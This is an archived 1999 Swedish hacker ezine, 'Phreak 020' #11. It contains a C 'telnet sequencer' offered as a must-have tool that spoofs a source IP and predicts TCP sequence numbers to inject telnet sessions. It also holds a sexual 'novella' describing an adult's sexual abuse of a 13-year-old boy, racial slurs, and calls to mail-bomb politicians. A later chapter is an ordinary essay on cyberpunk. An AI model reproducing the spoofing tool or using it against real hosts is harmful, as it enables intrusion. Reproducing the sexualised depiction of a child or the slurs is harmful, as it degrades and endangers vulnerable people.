OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
¯¯ ¯¯¯¯¯ /¯¯¯¯¯¯¯/¯¯/ /¯¯/¯¯¯¯¯¯¯/¯¯¯¯¯¯¯/¯¯¯¯¯¯¯/¯¯/ /¯¯/
¯ ¯¯ ¯¯¯¯ ¯ / /_/ / /_/ / /_/ / /¯¯¯¯¯/ /¯/ / /_/ /
¯ ¯¯¯ ¯ ¯¯¯ / _____/ / __/ __/ / ¯¯ / __/
¯¯ ¯¯¯¯¯ ¯¯¯ / / / /¯/ / /¯/ / /_____/ /¯/ / /¯/ /
¯¯¯ ¯¯¯¯ ¯ /__/ /__/ /__/__/ /__/_______/__/ /__/__/ /__/
Public domain! /¯¯¯¯¯/¯¯¯¯¯/¯¯¯¯¯/ ¯¯¯¯ ¯ ¯¯
Nummer: #11 1999-06-04 / / /¯¯/ / / / ¯¯ ¯¯¯ ¯¯¯¯¯
Information wants to be free / / /¯¯¯__/ / / ¯ ¯¯¯ ¯¯¯ ¯ ¯
/_____/_____/_____/ ¯¯ ¯¯ ¯¯¯¯¯
.-------.
Innehåll
'-------'
¤ Ledare
¤ Veckans SexNovell - |<r4xx0r H4XX0rn möter R41ph
¤ Telnet Sp00fer
¤ Slackware
¤ Färgblindtest
¤ Copyright finns inte 2.0 - Cyberpunk
.-----.
Ledare
'-----'
Waz up in da hood? Jag rappar på, för jag går om kring ute på staden sena
lördags kvällar och muckar gräl, fan vad jag är en elite jävla liten neger...
Veckans tycka synd om, wannabe elite pojke är... Zlickward! Denne lille pojke,
som inte kan något annat än att tro att han har det bra, måste upplysas om sin
fattigdom. I och försig fick den jäveln 28.000(!) till sitt körkort... Denna
veckas del av Copyright finns inte, borde dom som klagar på ripping läsa...
Cyberpunken är mot Copyright, tänk på det! Ni är bara några små wannabe Warez
Traders... piratez!
Okey så här är det! Alla flames, mailbombs, dålig kritik, dåliga presenter och
annat som jag inte tycker om skickas till carl.bildt@moderat.se, eller någon
annan fet gubbe, som ingen vill veta av, kallad Göran, statministern@gov.se...
Skyll inte på mig om adresserna inte funkar, det var ni som ville sända
skiten :P. Detta är fan Underground Ezinens år, typ hur många har inte startat
i år? Och Phreak 020 var ett av dom första... Därför ska jag kanske skriva en
artikel i nästa nummer om hur man gör sitt privata rippzine =).
Hatar alla personer som kommer in på sidan från promotor.telia.se, tninet.se,
eller med några av hosten som det står 'anst' i... Sluta, stick hem till Ralph
och dr0ga n3r 3r! För er information så är Phreak 020 på internet fullt legal
så 0nde R41ph kan inget göra mot ozz. Enjoy(En joint på) skolavslutningen,
själv ska jag på grillparty idag... =). Om cirka 8-9 timmar börjar ju min
avslutning. BTW Credits till VSP för dom flesta av bilderna. Jaja, dax att
sova snart... En rolig sak som hände mig förra helgen var att när jag var ute
-_-_-_-_-_-_-_-_-_-_-_-_-Error: Reciving Packets!_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
-_-_-_-_-_-_-_-_-_-_-_-_-Error: Reciving Packets!_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
-_-_-_-_-_-_-_-_-_-_-_-_-Error: Reciving Packets!_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
-_-_-_-_-_-_-_-_-_-An error occured while reciving packets!_-_-_-_-_-_-_-_-_-_
Om du åker fast för att ha prövat något illegalt härifrån så referera gärna
till zinet =), men det är inte vårt fel att du åker fast. Det är ju en fördel
om du läser detta zine i edit eller något annat program som kan läsa DOS
text(inte notepad). Let's Phreak...
Denna gång i zinet kollar vi på följande Veckans SexNovell, Telnet Sp00fer,
Slackware, Färgblindtest och Copyright finns inte 2.0.
.-----------------------------------------------.
Veckans SexNovell - |<r4xx0r H4XX0rn möter R41ph
'-----------------------------------------------'
Pelle, 13 år, hade just fått sitt internet abonnemang, ett Utfors 020. Han
skulle nu ut och surfa på addresserna han hade hittat i Internet World. Tufft
det här med nätet, tyckte Pelle. Det var så man blev beroende... Han visste
inte vad som fanns bakom nästa sökning på AltaVista. Han brukade hänga på
Webchattar som Passagens... Han ville ju bli duktig, som dom stora grabbarna
på skolan, som retade han för att han körde med legalt 020.
En dag så var Pelle i datasalen och smög på dom stora grabbarna, då såg han
att någon körde ett program kallat mIRC. Coolt tänkte Pelle, det där progget
ska jag fixa när jag kommer hem. Så han sökte på www.altavista.com med +mirc,
och se typ 10.000 sidor visade sig för Pelle. Han gick in på www.mircx.com och
laddade ner ett k-rad script, Kill3r Att4ck. Inte dåligt... Han tog Pelle_13
som nick och försökte rekonstruera hur dom stora grabbarna i skolan hade
gjort förut:
/server irc.df.lth.se:6668
/join #Sweden
/join #Hot
/join #Poppis
/join #2600
Oj, va många häftiga fönster som poppade upp ur tomma intet. Pelle upptäckte
att mIRCen inte var så svåra att fatta... Till höger personerna som mIRCar,
och till vänster texten. What the fuck, folk snackar ju så man inte fattar
jotta, sa Pelle som drack sin Coca-Cola. Jolt existerarde inte för han... ppl,
a/s/l, a/s/l/pic, wtf, bbl, thx var några av dom kluriga orden som människorna
använde... Och nästa lördag upptäckte han att folk kunde använda färger, vilka
hackers alltså! Pelle som var newbie gick omkring och frågade en massa frågor
om hur man gjorde och förkortningarnas betydelse. Varje gång han fick reda på
något nytt leda detta till att adrealinet i hans hjärna kokade och så att han
fick orgasm...
En dag så kom han in på #elitehackers, och vad fick han se, om inte nya
kryptiska texter, typ: 3v11 H4xx0rz g0t d4 w4r3z... Hum....??? Vad fanken var
nu detta då? Uhhh, är 3=E, 4=A, 1=L,I, 0=O och XX=CK? Kewl sa Pelle, som nyss
lärt sig detta ord. Rätt så kewlt ändå... så borde man ju börja köra, tänkte
Pelle:
/nick |<r4xx0r_H4XX0r
*** Pelle_13 is now known as |<r4xx0r_H4XX0r ***
Nu kommer adrealinet igen... Nu ska är läras om Hacking och liknande. Pelle,
hade ju hört att Telia 020 skulle vara lätt att hacka. Så om han tradade till
sig ett sånt så kunde han ju bli en k-rad haxx0r... Han hängde på kanaler som
#Telia020. Men för att få 020 så måste han ha något och trada med, och det
enda han hade var ju sitt Utfors 020. Så vad skall man göra när nöden kommer
till en? Jo, TREJDA!!! Hehe, nu skulle här köras gratis 020. Han satt online
10 veckor i sträck genom sin pappas morbrors laptop, med mobil uppkoppling.
När det var den 14:de och räkningen kom, fick han en ovanligt liten räkning
medans tant Grön fick en räkning på 500 000 eller något sånt...
Tant Grön tog kontakt med Ralph på Twlia, och fråga va fan det var frågan om.
Ralph och dom på Telia Internetservice fick kolla loggarna och mycket riktigt,
Pelles telefon nummer återfanns där. Här skulle Pelle nu få fan, Ralph tog
kontakt och ville att Pelle skulle kom till Göteborg. Pelle hade inget annat
val, eftersom hans pappa nästan höll på att mörda honom. När han träffade 0nde
R4lph, så låst Ralph in honom i ett rum. Ralph kom in i rummet och band fast
Pelle och hade smisksex med han sen fick Pelle gå utan att få telefonen
avständ, skönt för båda alltså...
Denna text är tillängnad Neger-Johan som fick stryk av sin farsa när dom fick
telefonen avstängd för tre(3!) år framöver. Detta var 1998, och han körde med
ett stulet 020... Ja du Johan, så går det när man inte spoofar =)
//Celsius
.-------------.
Telnet Sp00fer
'-------------'
Denna feta Telnet Spoofern(Sequencern) är ju ett must have...
------------------------------<TelSpoof.c>------------------------------------
/* */
/* tELNET SEQUENCER v0.0001 = DEVELOPED BY VECT0R-X */
/* Under Solaris try: */
/* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */
#include "/usr/include/netinet/tcp.h"
#include <fcntl.h>
unsigned long sourceport = 1036;
unsigned long dest, spoofed, src, nseq, tarport, temp;
char str[255], *string;
char buf[4096];
char spoofdir[10], *spoofid;
char spoofbuf[42];
int len, rec, sen, i=1, adder=128000, stringlen=0;
int spooffd, spooflen;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
void main(int argc, char *argv[])
{
unsigned long fakesequence = 408618+getpid();
sourceport+=getpid();
printf("tELNET SEQUENCE - Writtin by vect0rx.\n\n");
if (argc != 5) {
fprintf(stderr,"Usage: %s <server> <port> <spoof> {1|2}\n\n",argv[0]);
fprintf(stderr," <server> - Site spoof is attempted on.\n");
fprintf(stderr," <port> - Port to access on <server>.\n");
fprintf(stderr," <spoof> - Host to appear from.\n");
fprintf(stderr," 1 - Offset of 128000 (common).\n");
fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n");
exit(1);
}
tarport = atoi(argv[2]);
if (argv[4][0] == '2') adder=64000;
memset(&spoofedaddr,0,sizeof(spoofedaddr));
spoofedaddr.sin_family = AF_INET;
if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[3])) == -1) {
if ((host = gethostbyname(argv[3])) == NULL) {
printf("Unknown host %s.\n",argv[3]);
exit(1);
}
spoofedaddr.sin_family = host->h_addrtype;
memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length);
}
memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4);
memset(&addr,0,sizeof(addr));
addr.sin_family = AF_INET;
if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
if ((host = gethostbyname(argv[1])) == NULL) {
printf("Unknown host %s.\n",argv[1]);
exit(1);
}
addr.sin_family = host->h_addrtype;
memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);
}
memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);
if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
perror("error: recv socket");
exit(1);
}
if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("error: send socket");
exit(1);
}
sen = openintf("ppp0");
#ifdef IP_HDRINCL
fprintf(stderr,"IP_HDRINCL is set\n");
if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) {
perror("setsockopt IP_HDRINCL");
exit(1);
};
#endif
gethostname(buf, 128);
if ((host=gethostbyname(buf))==NULL) {
fprintf(stderr, "Can't get my hostname!?\n");
exit(1);
}
memcpy(&src,host->h_addr,4);
sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport,
tarport, fakesequence, 0, NULL, 0);
for (;;) {
gettcppacket(rec,buf,sizeof(buf));
ip = (struct iphdr *) buf;
if (ip->saddr != dest) continue;
len = ip->ihl << 2;
tcp = (struct tcphdr *) (buf+len);
if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) {
temp=htonl(tcp->th_seq);
nseq=temp;
nseq+=adder;
printf("Sequence returned is %lu, Offset is %lu\n",
nseq, adder);
sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport,
tarport, fakesequence, 0, NULL, 0);
break; /* out of for loop */
}
}
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport,
tarport,fakesequence,0,NULL,0);
printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout);
usleep(10000);
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport,
tarport,++fakesequence,++nseq,NULL,0);
printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout);
usleep(5000);
printf("Sending irc client handshake.\n"); fflush(stdout);
strcat(spoofdir, "./telnet.d");
spooffd = open(spoofdir, O_RDONLY);
if (spooffd < 0) {
perror("open: ");
exit(0);
}
else
{
spooflen = read(spooffd, spoofbuf, sizeof(spoofbuf));
spoofid = strtok(spoofbuf, "\r\n");
}
stringlen = strlen(spoofid);
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
tarport,fakesequence,nseq,spoofid,stringlen);
fakesequence+=stringlen;
for(;;) {
printf("telnet:%s> ", argv[1]); fflush(stdout);
string = fgets(str, 255, stdin);
stringlen = strlen(string);
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
tarport,fakesequence,nseq,string,stringlen);
fakesequence+=stringlen;
}
}
/*
*/
------------------------------<TelSpoof.c>------------------------------------
//Celsius
.--------.
Slackware
'--------'
Slackware är bara för avdestillerade slackers, typ den i PC+ som klagade på
att dom hade skrivit Slackware 6.3 istället för Slackware 3.6... Red Hat
ligger ju på 6.0 så ska Slackware vara bättre på något sätt så måste det först
och främst ha högre versions nummer. Detta fattar ju varje newbie... Dålig
stil att klaga, du kommer bli en såndär admin på en skola och vara stolt över
ditt tCP/ip nätverk med en NT maskin som server. Uschhh :P... Ja vi andra
kommer att fixa publicitet och bli berömda och tjäna så mycket $$$, att vi kan
dra oss tillbaka 30 år före din pension. Du kommer sitta där och skrika åt
alla elever som startar en DOS-session för att läsa Phreak 020. Dålig Stil!!!
//Celsius
.------------.
Färgblindtest
'------------'
Kan du läsa följande meddelande så är du troligen inte färgblind, så ge mig
credits! Om du upptäcker att du inte kan läsa det tacka mig, som fick dig att
inse att du är blind/färgblind... För coola/psykedeliska effekter är det bara
att scrolla upp och ner snabbt. Och komihåg, det är inte mitt fel om du får
ett epileptiskt anfall! Om du upptäcker att du har epilepsi tacka mig...
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
<<<<< <<<<<<<<<<<<<<< <<<<< <<<<<<<<< <<<< <<<<<
>>>>> >>>>>>>>>>>>>>> >>>>>>> >>>>> >> >>>>>> >> >>>> >>>>>>>>>>>>>>>
<<<<< <<<<<<<<<<<<<<< <<<<<<< <<<<< <<<< <<< <<< <<<< <<<<<<<<<<<<<<<
>>>>> >>>>>>>>>>>>>>> >>>>> >>>>>> >>>> >>>> >>>>>
<<<<< <<<<<<<<<<<<<<< <<<<<<< <<<<< <<<<<<< <<<<<< <<<< <<<<<<<<<<<<<<<
>>>>> >>>>> >>>>>>> >>>>> >>>>>>> >>>>>> >>>> >>>>>
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
//Celsius
.-----------------------------------.
Copyright finns inte 2.0 - Cyberpunk
'-----------------------------------'
Här är den åttonde delen till den kända boken Copyright finns inte, Version
2.0. För att kunna läsa den så används en speciel teknik för att markera feta ord
och kursiva ord. Om ett ord markers med _understreck_ så betyder det att ordet
är i fet stil, och är det *stjärnor* runt ett ord betyder det att ordet är
kursivt. Det kommer komma ett nytt kapitel i varje nummer tillsvidare...
Bokens hemsida är: http://www.df.lth.se/~triad/book/
_CYBERPUNK_
Cyberpunk är från början en litterär och filmrelaterad rörelse. Vi
börjar med litteraturen.
Det finns olika sorters Science fiction (kort: SF), och definitionen på
vad som är vad är ganska godtycklig. Bibliografier över SF sträcker sig ofta
över så vida områden som *fantasy* och *skräck*. Den här boken skall inte
handla om SF litteratur. Vill man veta mer om SF kan man med fördel leta reda
på _Sam J Lundwalls_ uttömmande essäer i ämnet. Vi går istället rakt på den
del av science fiction som kallas cyberpunk.
Definitionen på den typ av SF-litteratur som kallas cyberpunk brukar vara
att det är verk som liknar något som _William Gibson_ har skrivit; en typ av
futuristisk framtidsskildring där avancerad data- nano- och bioteknik liksom
artificiell intelligens tillhör vardagsmaten. Världen är stenhårt segregerad
till en liten styrande elit av multinationella företag och en stor brutal
massa av vanliga människor. Regeringar har fått ge vika för storföretag och
maffior, och det är dessa som kontrollerar världen. Handlingen brukar utspela
sig i enorma storstäder av ghettokaraktär. Droger av allehanda slag är allmänt
förekommande, tempot är högt och person- och miljöbeskrivningarna ytliga och
gärna (i Gibsons fall) fulla med varumärken och allehanda datatermer. En
typisk cyberpunkberättelse utspelar sig kring år 2020.
Man brukar säga att cyberpunken är *dystopisk*, alltså att den beskriver
en *dyster utopi*. De flesta tidiga SF romanerna var utopier där alla
sjukdomar var utplånade och ett enhetligt samhällssystem tagit över efter alla
ständiga konflikter, och handlingen cirklade oftast kring en grupp
vetenskapsmän på uppdrag i universum eller rymdhjältar typ Blixt Gordon.
TV-serien *Star Trek* är exempelvis en uttalad utopi. Det är inte så att alla
problem saknas i en utopi, det är bara det att *"de goda"* alltid är givna
vinnare och aldrig moraliskt tvivelaktiga. Alla utopier är optimistiska
framtidsskildringar.
I en dystopi finns många problem kvar i världen, miljön är i det närmaste
fullständigt förstörd och politiken som alltid kaotisk. Böckerna blir därför
mycket mer trovärdiga och realistiska än klassiska SF romaner, och har funnit
en mycket stor läsarkrets bland människor som normalt inte läser SF. Tidigare
menade man att det var onödigt att beskriva verkligheter som var *värre* än
den som fanns på jorden. En del dystopiska författare som exempelvis _Stephen
King_ övergav därför SF för att i stället skriva skräcklitteratur. Dystopier
är dock mera lämpade för samhällskritik än utopiska verk. Då de flesta
dystopier är satiriska eller komiska, utgör cyberpunken en bjärt kontrast med
sin iskalla realism. Andra kända dystopier är t ex _Karin Boyes_ *Kallocain*
eller _George Orwells_ *1984*.
Precis som den mesta SF från USA har cyberpunken rötterna i den sk
*pulplitteraturen*. Pulp är en sorts grov pappersmassa som användes till
billiga SF- och deckartidningar under 50-talet i USA. Eftersom filmindustrin
inte var så långt gången vid den tiden läste man mycket mer böcker och
tidningar, och pulp var så att säga den "ofina", billiga litteraturen. (Det
svenska *Jules Verne magasinet* skulle man kanske kunna kalla för
pulptidning.) Serietidningar och TV-serier som *Blixt Gordon* kallas också
pulp, eftersom de inspirerats av teckningar och historier från dessa
tidningar. Pulp ter sig mest fjantigt och fruktansvärt orealistiskt för en
normal svensk läsare, men för SF älskare över hela världen är pulp ursprunget
och källan till all modern SF, och upphov till en egen subkultur i sig.
Sterling och Gibson och några andra SF författare hade en egen pulptidning
som hette *Cheap Truth*. Detta var i och för sig inte på 50-talet, men den
drevs i samma anda som de bästa tidiga pulptidningarna. Man tyckte att det
inte producerades någon vettig SF. Man uppmanade folk att starta sina
ordbehandlare och skriva *bra, levande *och *läsbar* SF. Man rackade inte så
sällan ned på bästsäljande författare inom genren. En lustig detalj med Cheap
Truth är att den inte var copyrightskyddad, och att kopiering och spridning
uppmuntrades.
Cyberpunk är nu lite mer än så, men den litterära genren är så gott som
synonym med en liten grupp amerikanska författare, varav William Gibson och
_Bruce Sterling_ är de mest namnbekanta. En del 2000 AD serier, framför allt
*Judge Dredd* räknas också till cyberpunken, eftersom världsbilden i dessa
till viss del liknar Gibsons dystopier. Beteckningen cyberpunk lär ha
uppfunnits av en herre vid namn _Gardner Dozois_ i en recension av Gibsons
första roman *Neuromancer*. Den etiketten skall han i sin tur ha tagit från en
novell av _Bruce Bethke_ som låg på Dozois' bord för granskning.
Cyberpunkromanens budskap är att vara ett varnande finger - romanerna är
mardrömsvisioner av ett framtida samhälle som vi riskerar att hamna i om vi
inte ser upp. Ordet cyberpunk kommer av *cybernetik* = människa eller samhälle
i samspel med maskiner (av gerkiskans *kybeternetes* = styrman), och *punk* =
näst intill laglös individ med lätt anarkistisk syn på samhället, typ cowboy,
som lever i den undre världen. Huvudpersonerna i Gibsons romaner är ofta
"punks". Man skulle kunna jämföra en "punks" vardag med det mentala klimatet i
den fascinerande svenska filmen *Sökarna*, som även den är en sorts dystopi.
_Musik_
Cyberpunkmusik brukar man vanligtvis kalla musik av den typ som produceras
av den kanadensiska tungsyntduon _Front Line Assembly_ (bildad av Skinny
Puppy-producenten _Bill Leeb_) och grupper med liknande image, t ex svenska
_Cat Rapes Dog_, som i sina texter målar nattsvart ironiska och pessimistiska
framtidsbilder liknande de som nämnda författare gärna producerar. Många
texter är också laddade med politiska budskap som verkligen hör till den
ideologiska sidan av cyberpunk som jag strax skall gå in på. Ett gäng musiker
med tydlig politisk linje som främst kritiserar media och medias påverkan på
människan, miljöförstöring och "smutsig" teknologi, kallas _The Tribe_ och
består av nämnda kanadensiska band plus några grupper från Chicago som t ex
_Ministry_ och _Revolting Cocks_. Alla dessa band har dock skapats med
utgångspunkt från de böcker och filmer som har anknytning till cyberpunk och
inte ur någon egen förnyelserörelse.
Ljudbilden i cyberpunkmusik är för det mesta någonstans mellan *EBM*,
*Crossover* eller *Metal*, gärna med distade vokalister och skrikigt samplade
gitarrer.
*Tystaden bedövar
regressionen tynger luften
en förlamad värld inväntar
de nya koderna
ett teknikens krig som
hotar att initiera
digitala mord -
maskinens språk.*
**
(Ur *Mindphaser* av _Frontline Assembly_)
_Film_
Cyberpunkfilm är lite svårare att definiera; många brukar kalla _Ridley
Scotts_* Blade Runner* från 1979 för den första cyberpunkfilmen, och det är
inte helt fel: miljön i filmen är bitvis mycket lik det "Sprawl" som beskrivs
i Gibsons romaner, men Neuromancer, Gibsons mest kända verk, kom inte förrän
1982. I så fall är det frågan om vem som egentligen var först med idéerna. En
del betraktar av denna anledning _Philip K Dick_ som skrev romanen *Androidens
Drömmar* (1968) vilken låg till grund för manuset till Blade Runner, såsom
genrens egentliga upphovsman. Det hela är därmed en definitionsfråga. En annan
roman som har tydliga paralleller med Gibsons alster är _John Brunners_
*Shockwave Rider*. En uförligare översikt av den litterära cyberpunkens rötter
finns i förordet till antologin *Mirrorshades - the Cyberpunk Anthology* av
Bruce Sterling.
När jag ändå är inne och kopplar litteratur och film som hör ihop med
cyberpunk kan jag inte undvika att nämna _William Seward Burroughs_. Denne
beatnikförfattare och fd knarkare har haft inflytande på nästan alla områden
inom cyberpunkkulturen. Han har skrivit böcker, varav den mest välkända är
*Den Nakna Lunchen*, där han liknar individens beroende av samhällsmaskineriet
vid en knarkares behov av sin langare och olika sexuella beroendesituationer.
Boken var nära att censureras pga sin obscena framtoning. Burroughs var mest
ute efter att skaka om. Han har sedan dess sysslat med musik, bildkonst och
film (han lånade bland annat ut titeln till *Blade Runner* från en bok med
samma namn han tidigare gett ut), skrivit otaliga essäer, dikter och
betraktelser och gett ut ett flertal romaner varav flera lyckligtvis finns
översatta till svenska. Ett genomgående tema hos Burroghs är att han vill lösa
upp gränserna för betvingande system genom att föra in *kaos* i systemen.
Sedan *Den Nakna Lunchen* publicerades har han skrivit sina böcker med *cut-up
tekniken*, som innebär att man kan börja läsa boken var som helst och sluta
var som helst och ändå få ungefär samma behållning av den.
Den kanske mest litterärt betydelsfulla av Burroughs böcker är SF-romanen
*Nova Express* (1964) där han lånar meningar och fraser av författare från när
och fjärran för att bygga en mosaik av textfragment. I denna roman
introducerar han också för första gången tanken att göra musik med samma metod
i form av romanfiguren Subliminal Kid som blandar en ljudmix av fragment från
bakgator och torg.
*"Gör en tio minuters inspelning på en bandspelare - Kör bandet baklänges utan
att spela och klipp in andra ord på måfå - På de ställen där man har klippt
och spelat in nytt har orden suddats bort från bandet och nya ord har kommit i
stället - På så vis har man vridit tiden tillbaka tio minuter och suddat ut
elektromagnetiska ordmönster från bandet och ersatt dem med andra mönster -
Det går att göra samma sak med tankebandet efter att ha arbetat med
bandspelaren - (Detta kräver en del övning) - De gamla tankebanden kan suddas
rena - Magnetiskt orddamm som faller från gamla mönster - Ord faller - Bild
faller"*
(Ur *Nova Express*)
*Tetsuo* (Järnmannen) är en japansk film från 1989. Filmen sågs som en av de
mest nyskapande japanska filmerna under 80-talet, med rötter i den japanska
animationstraditionen - samma skola som de tecknade sk *Mangafilmerna* härhör
från. Järnmannen handlar om en människor som får sina kroppar invaderade av
maskiner; kampen mellan det goda och onda, det mänskliga och mekaniska. En av
de filosofiska linjerna tycks vara att det inte spelar någon roll om man är
mänsklig eller metallisk, gott och ont är begrepp som står bortom sådana
ytliga faktorer. Denna film är för övrigt en av William Gibsons absoluta
favoriter.
Andra filmer som har otydliga kopplingar till cyberpunkgenren är
postapokalyptiska "efter kriget"-filmer som _Tarkovskis_ *Stalker* eller *Mad
Max*-filmerna, mest därför att de hör till den dystopiska familjen som
skildrar förfall snarare än människans seger över naturen. *Alien*-filmerna
skildrar ett samhälle där hela jorden, eller i princip hela universum, styrs
fullständigt av ett enda företag. Ingenstans i någon av filmerna skymtar ett
enda grönt blad eller en enda sekund solljus. Man får nästan intrycket av att
naturen fullständigt rationaliserats bort. Gibson i kvadrat och kubik alltså -
värre kan det knappast bli.
Blade Runner och Tetsuo är som sagt ett kluvet kapitel, men vad som är
moderna cyberpunkfilmer är lite mer givet: *Hardware, Robocop, Total Recall*
och framför allt *Gräsklipparmannen* och den japanska filmen *Gunhed*
betraktas mer allmängiltigt som cyberpunk. Även den riktigt lyckade
norsk-svenska (!) SF-filmen *Femte Generationen* kan i någon mån betraktas som
inspirerad av den amerikanska cyberpunken. Samtliga filmer har det gemensamt
att de totalt sågats av många recensenter och ändå betraktas som klassiker i
sin genre och är kultfilmer bland hackare. Filmerna lyckades uppenbarligen
skapa något som var så nytt att inte alla förståsigpåare förstod sig på dem.
Filmatiseringen av William Gibsons novell *Johnny Mnemonic*, efter hans
eget manus, kan också den betraktas som ett referensverk, även om den sågades
av kritikerna eftersom alla hollywoods filmskapare redan stulit alla Gibsons
idéer till sina filmer. Gibson hade inget nytt att tillföra cyberpunkfilmen.
_Cyberpunk som Ideologi_
Litteratur, musik och film som sagt, men cyberpunk är trots allt lite mer
än så. Den litterära rörelsen har nämligen fått låna namn åt en ideologi
också, och den delen av cyberpunken är inte lika enkel. De flesta hackare
betraktar sig nämligen som cyberpunkare och det hela rör sig kring
*information*. Vi såg tidigare hur viktigt det var för amatörhackarna att
kunna kommunicera fritt genom att skicka disketter med post och för
högskolehackarna att kunna kommunicera via Internet. Informationens frihet är
också medelpunkten i den ideologi som förknippas med termen cyberpunk.
Anledningen till att man kallar denna ideologi cyberpunk är att den bland
annat tog sin början som en diskussion om samhället med utgångspunkt från de
dystopier som konstruerats av bl a Gibson.
Frågan är om man kan kalla cyberpunken för en genuin ideologi, eftersom
den inte finns inom någon klart avgränsad intressegrupp och inte har någon
ledande företrädare, men jag använder här begreppet som ett samlingsnamn för
den politiska attityd som sprids inom kretsarna av nätanvändare, hackare och
andra informationsaktivister. Man skulle snarare kunna påstå att det är ett
tillägg som kan hakas på en redan befintlig ideologi, och definierar begreppet
*mental frihet*. Skall man precisera begreppet *cyberpunkare* så som det
används av de som själva kallar sig cyberpunkare blir det ungefär följande
(def):
_En cyberpunkare är en person i ett högteknologiskt samhälle som besitter
besitter information och/eller kunskaper som den etablerade makten (eller
makterna) helst hade sett begränsad till sin egen sfär._
Huvudpersonen Case i Gibsons roman *Neuromancer* besitter både information och
kunskaper som de etablerade makterna inte vill se hos vanliga medborgare.
Detsamma gäller alla typer av hackare i vårt eget samhälle. Därav kopplingen.
Till skillnad från Gibsons romanfigurer har verklighetens cyberpunkare ett
*moraliskt etos*, en gemensam värderingsgrund som ger dem en gruppidentitet.
Dessa moraliska värderingar har vuxit fram successivt sedan 60-talet. I botten
av cyberpunkens ideologiska arv ligger den hackaretik som nedtecknats av
_Steven Levy_ i boken *Hackers - Heroes of the computer revolution*, delad på
sex punkter (motton), och som på svenska ser ut såhär:
_1. Tillgången till datorer - och till vad som helst som kan tänkas lära dig
någonting om hur världen fungerar - borde vara obegränsad och total. Följ
alltid _*hands-on*_-imperativet._
*Hands-on*-imperativet är en pedagogisk uppmaning som innebär att man lär sig
mer om hur bl a datorer och program fungerar genom att fingra på dem, skruva
isär dem och se hur de ser ut inuti. (Är det någon som har en bra svensk
översättning av detta uttryck?) Miniatyriseringen av elektroniken och den höga
nivå av komlexitet som dagens dataprogram har gör dessvärre detta ganska svårt
rent praktiskt. Ursprungsbetydelsen kan nog omformuleras till att: *Alla borde
ha rätt att förstå sin utrustning på ingenjörsplanet, om de så önskar.* Den
svenska ABC-klubben hade hands-on-imperativet inskrivet i klubbpolicyn: *"en
bra lösning på problemet med kopieringsskydd är att strunta helt i det"*. (Ur
ABC-bladet #2 1984) Kopieringsskydd retar gallfeber på vilken hackare som
helst och ställer bara till problem. All modifiering, förbättring eller
granskning av ett dataprogram försvåras av kopieringsskydd. Dessutom är det
provocerande eftersom hackare gärna tillbringar flera dagar och veckor med att
knäcka det, om inte annat så bara för principens skull.
Men hands-on har även en politiskt betydelse: fingra på systemet, besvära
politiker och tjänstemän och försök förstå hur det hela fungerar rent
praktiskt. (Med andra ord: social ingenjörskonst.) Dessa praktiska lärdomar är
bättre än att läsa politologi och statskunskap. Hackare drar verkligen sådana
paralleller till verkligheten utifrån datorer - och eftersom datorer bara är
ytterligare ett system som konstruerats av människor får detta sägas vara
fullt befogat.
Den här regeln är förmodligen den äldsta av alla hackarens etiska motton,
säkert med ursprunget hos de första amatörradioentusiasterna från år 1915.
_2. All information borde vara fri._
Motarbeta restriktioner som stoppar informationen. I förlängningen: *avskaffa
allt vad copyright heter*, dock inte upphovsmannarätt, vilket är en helt annan
sak. Du har t ex rätt att, så länge du lever, sätta restriktioner för hur
"din" information manipuleras, om någon direkt går in och bearbetar det du
skapat. Däremot har du ingen som helst rätt att kräva kontroll över
spridningen, alltså hur program, texter, musik osv kopieras när du väl släppt
den ifrån dig.
Kriteriet motverkar sekterism och elittänkande, du kan ha informationen
antingen för dig själv, eller också dela den med alla. Små grupper av
informationssyndikat, kunskapsmaffior och profitörer, skall inte får finnas.
Varken mjukvaruföretag eller snikna pirater har rätt att pressa pengar ur en
privatperson som bara är ute efter information, det må sedan vara
kalkylprogram, böcker eller rena mentala kunskaper.
Sedan 60-talets hackare har mottot förändrats en smula: det vore dumt att
offentliggöra saker om dig som du inte vill att andra skall veta. Det finns
alltså viss information som rör individen själv och som hon därmed har rätt
att själv kontrollera. Ett modernt tillägg lyder: *Maximalt skydd för
privatlivet - minimalt skydd åt offentligheten,* som understryker betydelsen
av att begränsa bl a de stora personregistren. Denna vinkling har vuxit fram
framför allt under starkt inflytande från libertarianismen. (Mer om detta
längre fram.)
I mottot ligger en underförstådd tes om att *kunskap i allmänhet* inte kan
ägas, något som också följer naturligt av det första mottot. Även patent är
